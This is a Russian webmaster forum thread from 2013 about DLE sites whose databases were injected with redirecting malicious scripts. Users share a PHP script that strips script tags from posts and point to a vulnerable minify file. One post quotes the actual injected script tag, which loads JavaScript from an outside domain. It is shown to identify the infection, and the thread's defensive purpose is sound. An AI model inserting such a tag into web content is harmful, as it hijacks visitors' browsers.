X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

4 страниц V   1 2 3 4 >
Открыть тему
Тема закрыта
> Взлом DLE
GET_ini
GET_ini
Topic Starter сообщение 15.9.2013, 23:42; Ответить: GET_ini
Сообщение #1


Участник
***

Группа: User
Сообщений: 218
Регистрация: 6.11.2012
Из: Украина
Поблагодарили: 31 раз
Репутация:   6  


Доброй ночи! Сегодня по ЯВ увидел предупреждение про вредоносный код на 3 сайтах. Все DLE. Захожу на них, делаю клик мышкой - редирикт на сайт другой.

Вот пациент http://vkgraffiti.ru/

Вопрос такой: кого-то взламывали так же? Где копать? В JS или где-то в другом месте? Шаблон чист. DLE обновил - но это не помогло...
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
install
install
сообщение 15.9.2013, 23:46; Ответить: install
Сообщение #2


Яндекс ЛОХ
*******


Группа: Active User
Сообщений: 3530
Регистрация: 28.5.2009
Из: Нижневартовска
Поблагодарили: 1376 раз
Репутация:   201  


GET_ini, в БД скрипты левые посмотрите
в поиске ищите script, если есть, то туда залили

точно в БД сидит

создайте php файл, залейте в корень сайта и выполните его.
БД почистится, но нужно искать дыру, снова закинут его.

Развернуть/Свернуть
<?php

if(isset($_GET['blank'])) die();

error_reporting(0);

set_time_limit(0);

function stripslashes_array($array) {

return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);

}

if(get_magic_quotes_gpc()) $_POST = stripslashes_array($_POST);



session_start ();

define ( 'DATALIFEENGINE', true );

$member_id = FALSE;

$is_logged = FALSE;

define('ROOT_DIR', dirname( __FILE__ ));

define('ENGINE_DIR', ROOT_DIR.'/engine');



require_once ROOT_DIR.'/engine/init.php';

?>

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />

<title>Доктор DLE от SEO-KinG.RU</title>

<style type="text/css">

body, td, th {

color: #333;

font-family: Arial;

font-size: 14px;

}

</style>

</head>

<body>

<?php

if(isset($_POST['submit'])) {

echo '<div id="result">';

$posts = $db->query("SELECT `id`, `full_story`, `short_story` FROM `".PREFIX."_post`");

while($post = $db->get_row($posts)) {

$post['full_story'] = preg_replace('/(<script.*<\/script>)/Usi', '', $post['full_story']);

$post['short_story'] = preg_replace('/(<script.*<\/script>)/Usi', '', $post['short_story']);

$sql = 'UPDATE `'.PREFIX.'_post` SET `full_story`="'.mysql_escape_string($post['full_story']).'", `short_story`="'.mysql_escape_string($post['short_story']).'" WHERE `id`='.$post['id'];

$db->query($sql);

}

echo 'Готово';

echo '</div>';

}

?>

<form action="" method="post">

<input type="submit" name="submit" value="Начать" />

</form>



</body>

</html>


Сообщение отредактировал install - 15.9.2013, 23:52


--------------------


Поблагодарили: (2)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
DukeNukem
DukeNukem
сообщение 15.9.2013, 23:50; Ответить: DukeNukem
Сообщение #3


DNSTUFF
*****

Группа: Active User
Сообщений: 638
Регистрация: 7.10.2010
Из: Украина. Запорожье
Поблагодарили: 240 раз
Репутация:   39  


<script async="async" type="text/javascript" src="http://google-webmaster.ru/767c23430487b6c64d45b83d5d32e9a1.js"></script>


Вот вредоносный код, на сайте клиента был в базе данных


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
install
install
сообщение 15.9.2013, 23:55; Ответить: install
Сообщение #4


Яндекс ЛОХ
*******


Группа: Active User
Сообщений: 3530
Регистрация: 28.5.2009
Из: Нижневартовска
Поблагодарили: 1376 раз
Репутация:   201  


DukeNukem, еще может быть yandex-webmaster

GET_ini, если не поможет, замените script на object в файлике.

(GET_ini @ 16.9.2013, 1:42) *
DLE обновил

я с утра тоже почистил один сайт БД, обновил двиг.
Сижу целый день наблюдаю за ним, обратной вставки пока не было.

Сообщение отредактировал install - 15.9.2013, 23:58


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Belos
Belos
сообщение 16.9.2013, 12:38; Ответить: Belos
Сообщение #5


Старожил
******

Группа: Active User
Сообщений: 2468
Регистрация: 11.11.2008
Из: Украина
Поблагодарили: 695 раз
Репутация:   96  


Аналогичная ситуация и у меня на одном сайте. Кто-то нашел где эта бяка находится?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
install
install
сообщение 16.9.2013, 12:50; Ответить: install
Сообщение #6


Яндекс ЛОХ
*******


Группа: Active User
Сообщений: 3530
Регистрация: 28.5.2009
Из: Нижневартовска
Поблагодарили: 1376 раз
Репутация:   201  


Belos, замените файл с дистрибутива /engine/classes/min/index.php
http://dle-news.ru/bags/v10/1580-potencial...ule-minify.html

а то руками прописывал, не помогло, а в дистрибе там этот код не сверху а чуть ниже прописан.
ну и перед тем как менять будете, в папке engine/cache/system почистите всю лабуду-буду
вчера менял на нескольких сайтах, пока не достают.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
AMILO
AMILO
сообщение 18.9.2013, 0:43; Ответить: AMILO
Сообщение #7


Частый гость
**

Группа: User
Сообщений: 69
Регистрация: 12.4.2011
Поблагодарили: 2 раза
Репутация:   0  


(install @ 16.9.2013, 12:50) *
а то руками прописывал, не помогло, а в дистрибе там этот код не сверху а чуть ниже прописан.
ну и перед тем как менять будете, в папке engine/cache/system почистите всю лабуду-буду
вчера менял на нескольких сайтах, пока не достают.

А можете скинуть Ваш файл /engine/classes/min/index.php???
А как базу очистили? Вручную удаляли каждый скрипт или есть какой-то "быстрый" способ?!


--------------------
Лучший хостинг, uptime всегда 100%, немецкие сервера по очень выгодным ценам: регистрация
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Schmied
Schmied
сообщение 18.9.2013, 15:12; Ответить: Schmied
Сообщение #8


Бывалый
****

Группа: User
Сообщений: 460
Регистрация: 17.2.2010
Из: UA
Поблагодарили: 87 раз
Репутация:   11  


(AMILO @ 18.9.2013, 0:43) *
А как базу очистили? Вручную удаляли каждый скрипт или есть какой-то "быстрый" способ?!

я нашёл отличный скрипт в инете для массовой чистки базы. сделал два варианта - для внедрений типа script и для object

заливаете в корень сайта - запускаете, нажимаете кнопочку и всё - новости чистые. а вот статические не получается скриптом, но их обычно немного, можно и руками почистить.

прикладываю сами файлы - пользуемся smile.gif

скачать с яндекс

Сообщение отредактировал Schmied - 18.9.2013, 15:12
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Belos
Belos
сообщение 18.9.2013, 15:16; Ответить: Belos
Сообщение #9


Старожил
******

Группа: Active User
Сообщений: 2468
Регистрация: 11.11.2008
Из: Украина
Поблагодарили: 695 раз
Репутация:   96  


А тут что, трудно посмотреть скрипт чистки БД?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Schmied
Schmied
сообщение 18.9.2013, 16:04; Ответить: Schmied
Сообщение #10


Бывалый
****

Группа: User
Сообщений: 460
Регистрация: 17.2.2010
Из: UA
Поблагодарили: 87 раз
Репутация:   11  


Belos, да, согласен. проглядел. это то же самое smile.gif ну ничего, пусть будут и уже готовые файлы...

(AMILO @ 17.9.2013, 23:43) *
А можете скинуть Ваш файл /engine/classes/min/index.php???

присоединяюсь к просьбе, я тоже руками прописывал. интересно глянуть, в чём отличие нового файла от старого. может ещё что-то прописали разрабы, а в теме багфикса этого не указали...?

Сообщение отредактировал Schmied - 18.9.2013, 15:27
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
4 страниц V   1 2 3 4 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Услуги по CMS Wordpress, DLE, Joomla!. Правки, ремонт, настройка.
Редактирование и правки. Низкие цены.
143 contex1 65254 Вчера, 9:07
автор: contex1
Горячая тема (нет новых ответов) Регистрация Вашего сайта (профиля,DLE сайты,подписи на форумах,постинг Тиц 10> , ПР 1>)
278 kaartes 102962 14.12.2017, 10:55
автор: kukla
Открытая тема (нет новых ответов) Адаптивная вёрстка и натяжка на Wordpress, DLE, Joomla и др. Создание мобильных версий.
Хороший код с оптимизацией по скорости. Сайты и лендинги "под ключ
15 Nell 1181 13.12.2017, 23:36
автор: Nell
Открытая тема (нет новых ответов) Взлом? Брут? DDos?
5 Infacto 700 4.12.2017, 17:11
автор: metvekot
Открытая тема (нет новых ответов) Требуется так сказать оптимизация шаблона DLE
5 Deadman_n 422 2.12.2017, 13:24
автор: Deadman_n


 



RSS Текстовая версия Сейчас: 18.12.2017, 13:43
Дизайн